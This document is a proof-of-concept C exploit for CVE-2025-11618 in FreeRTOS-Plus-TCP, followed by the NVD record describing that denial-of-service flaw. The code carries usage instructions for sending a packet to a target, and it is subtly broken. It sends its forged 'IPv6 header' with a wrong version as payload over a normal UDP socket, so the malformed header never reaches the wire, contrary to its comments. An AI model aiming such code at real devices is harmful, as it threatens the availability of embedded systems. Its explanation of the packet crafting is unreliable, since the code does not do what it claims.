CVE-2025-11618

/* * CVE-2025-11618 PoC - FreeRTOS-Plus-TCP UDP/IPv6 Invalid Pointer Dereference * This PoC demonstrates how to craft a malicious UDP/IPv6 packet with * an incorrect IP version field to trigger the vulnerability. * * Usage: Compile and run against a target running FreeRTOS-Plus-TCP * with IPv6 enabled and a UDP service listening. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define TARGET_IP "::1" // Target IPv6 address #define TARGET_PORT 1234 // Target UDP port #define FAKE_VERSION 4 // Incorrect IP version (should be 6 for IPv6) int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in6 target_addr; unsigned char packet[128]; int ret; // Create UDP socket sockfd = socket(AF_INET6, SOCK_DGRAM, 0); if (sockfd < 0) { perror("socket creation failed"); return EXIT_FAILURE; } // Setup target address structure memset(&target_addr, 0, sizeof(target_addr)); target_addr.sin6_family = AF_INET6; target_addr.sin6_port = htons(TARGET_PORT); inet_pton(AF_INET6, TARGET_IP, &target_addr.sin6_addr); /* * Construct a malformed UDP/IPv6 packet: * - First byte: Version (4 bits) + Traffic Class (4 bits) * Set Version to 4 instead of 6 to trigger the bug * - Rest of the packet mimics IPv6 structure but with wrong version */ memset(packet, 0, sizeof(packet)); packet[0] = (FAKE_VERSION << 4) | 0x00; // Version=4, Traffic Class=0 packet[1] = 0x00; // Traffic Class (cont.) + Flow Label packet[2] = 0x00; packet[3] = 0x00; packet[4] = 0x00; // Payload Length (high byte) packet[5] = 0x20; // Payload Length (low byte) = 32 packet[6] = 0x11; // Next Header: UDP (17) packet[7] = 64; // Hop Limit // Source IPv6 address (bytes 8-23) for (int i = 8; i < 24; i++) { packet[i] = 0xfe; } // Destination IPv6 address (bytes 24-39) for (int i = 24; i < 40; i++) { packet[i] = 0xff; } // UDP header (starts at byte 40) packet[40] = 0x04; // Source Port (high) packet[41] = 0xd2; // Source Port (low) = 1234 packet[42] = (TARGET_PORT >> 8) & 0xFF; // Dest Port (high) packet[43] = TARGET_PORT & 0xFF; // Dest Port (low) packet[44] = 0x00; // Length (high) packet[45] = 0x20; // Length (low) = 32 packet[46] = 0x00; // Checksum (high) packet[47] = 0x00; // Checksum (low) // Payload memset(&packet[48], 'A', 32); // Send the malicious packet ret = sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&target_addr, sizeof(target_addr)); if (ret < 0) { perror("sendto failed"); close(sockfd); return EXIT_FAILURE; } printf("Malformed UDP/IPv6 packet sent to [%s]:%d\n", TARGET_IP, TARGET_PORT); printf("Packet size: %d bytes\n", ret); printf("IP Version field: %d (should be 6 for IPv6)\n", FAKE_VERSION); close(sockfd); return EXIT_SUCCESS; }

{"cve": {"id": "CVE-2025-11618", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.460", "lastModified": "2025-10-31T18:23:01.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's UDP/IPv6 packet processing code can lead to an invalid pointer dereference when receiving a UDP/IPv6 packet with an incorrect IP version field in the packet header. This issue only affects applications using IPv6.\n\nWe recommend upgrading to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-6fh9-mqxj-hmwj", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}